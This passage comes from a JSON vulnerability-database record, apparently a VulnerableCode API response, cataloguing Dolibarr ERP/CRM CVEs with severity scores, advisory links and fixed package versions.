-vg28","reference_id":"GHSA-jqfp-m5f8-vg28","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jqfp-m5f8-vg28"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18363?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.3"}],"aliases":["CVE-2021-42220","GHSA-jqfp-m5f8-vg28"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-83c2-jnk3-mbau"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/301997?format=json","vulnerability_id":"VCID-884a-z62x-dyhq","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16809","reference_id":"","reference_type":"","scores":[{"value":"0.00707","scoring_system":"epss","scoring_elements":"0.72638","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16809"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/9449","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/9449"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16809","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16809"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/386571?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2018-16809","GHSA-h34q-878w-w96r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-884a-z62x-dyhq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/129720?format=json","vulnerability_id":"VCID-9f3a-9c5y-juf1","summary":"Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30253","reference_id":"","reference_type":"","scores":[{"value":"0.89175","scoring_system":"epss","scoring_elements":"0.99555","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30253"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30253","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30253"},{"reference_url":"https://www.swascan.com/blog","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.swascan.com/blog"},{"reference_url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0"},{"reference_url":"https://www.swascan.com/blog/","reference_id":"blog","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://www.swascan.com/blog/"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"dolibarr","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/advisories/GHSA-9wqr-5jp4-mjmh","reference_id":"GHSA-9wqr-5jp4-mjmh","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9wqr-5jp4-mjmh"},{"reference_url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0/","reference_id":"security-advisory-dolibarr-17-0-0","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/"}],"url":"https://www.swascan.com/security-advisory-dolibarr-17-0-0/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379718?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-30253","GHSA-9wqr-5jp4-mjmh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9f3a-9c5y-juf1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/132184?format=json","vulnerability_id":"VCID-aeaq-1k3n-y7h1","summary":"File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38887","reference_id":"","reference_type":"","scores":[{"value":"0.03022","scoring_system":"epss","scoring_elements":"0.86915","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38887"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38887","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38887"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf","reference_id":"AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-g8h7-mcp6-pf47","reference_id":"GHSA-g8h7-mcp6-pf47","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-g8h7-mcp6-pf47"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379718?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38887","GHSA-g8h7-mcp6-pf47"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aeaq-1k3n-y7h1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/210759?format=json","vulnerability_id":"VCID-az9a-3z2g-9kht","summary":"Cross site scripting in dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2060","reference_id":"","reference_type":"","scores":[{"value":"0.00511","scoring_system":"epss","scoring_elements":"0.66887","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2060"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/2b5b9957c3010a5db9d1988c2efe5b209b16b47f"},{"reference_url":"https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/2acfc8fe-247c-4f88-aeaa-042b6b8690a0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2060","reference_id":"CVE-2022-2060","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2060"},{"reference_url":"https://github.com/advisories/GHSA-8fvr-7945-mg7w","reference_id":"GHSA-8fvr-7945-mg7w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8fvr-7945-mg7w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/19494?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-bjem-6exd-9kf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-2060","GHSA-8fvr-7945-mg7w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-az9a-3z2g-9kht"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/43264?format=json","vulnerability_id":"VCID-azy5-es2r-yyex","summary":"Incorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-31503","reference_id":"","reference_type":"","scores":[{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.18155","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-31503"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-31503","reference_id":"CVE-2024-31503","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-31503"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md","reference_id":"CVE-2024-31503.md","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-08-19T20:05:15Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md"},{"reference_url":"https://github.com/advisories/GHSA-6ppg-rgrg-f573","reference_id":"GHSA-6ppg-rgrg-f573","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6ppg-rgrg-f573"}],"fixed_packages":[],"aliases":["CVE-2024-31503","GHSA-6ppg-rgrg-f573"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-azy5-es2r-yyex"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/133710?format=json","vulnerability_id":"VCID-bthp-4km9-ekhz","summary":"Cross-site Scripting (XSS) - Generic in GitHub repository dolibarr/dolibarr prior to 18.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5323","reference_id":"","reference_type":"","scores":[{"value":"0.00206","scoring_system":"epss","scoring_elements":"0.43037","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5323"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5323","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5323"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15","reference_id":"695ca086847b3b6a185afa93e897972c93c43d15","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15"},{"reference_url":"https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8","reference_id":"7a048bb7-bfdd-4299-931e-9bc283e92bc8","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/"}],"url":"https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379242?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0"}],"aliases":["CVE-2023-5323","GHSA-39m3-cj8c-886r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bthp-4km9-ekhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45101?format=json","vulnerability_id":"VCID-cjmf-3m54-x3af","summary":"An arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL file.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-37821","reference_id":"","reference_type":"","scores":[{"value":"0.00234","scoring_system":"epss","scoring_elements":"0.46464","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-37821"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37821","reference_id":"CVE-2024-37821","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37821"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md","reference_id":"CVE-2024-37821.md","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-p7r8-7w87-8g46","reference_id":"GHSA-p7r8-7w87-8g46","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p7r8-7w87-8g46"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31892?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-37821","GHSA-p7r8-7w87-8g46"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cjmf-3m54-x3af"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/209781?format=json","vulnerability_id":"VCID-dzuu-tkyp-8udb","summary":"Dolibarr arbitrary commands execution","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10092","reference_id":"","reference_type":"","scores":[{"value":"0.00426","scoring_system":"epss","scoring_elements":"0.62723","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10092"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10092-dolibarr-admin-panel-authenticated-remote-code-execution-rce-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10092-dolibarr-admin-panel-authenticated-remote-code-execution-rce-vulnerability"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/2","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10092","reference_id":"CVE-2018-10092","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10092"},{"reference_url":"https://github.com/advisories/GHSA-6j62-m2vv-wc3m","reference_id":"GHSA-6j62-m2vv-wc3m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6j62-m2vv-wc3m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/21306?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"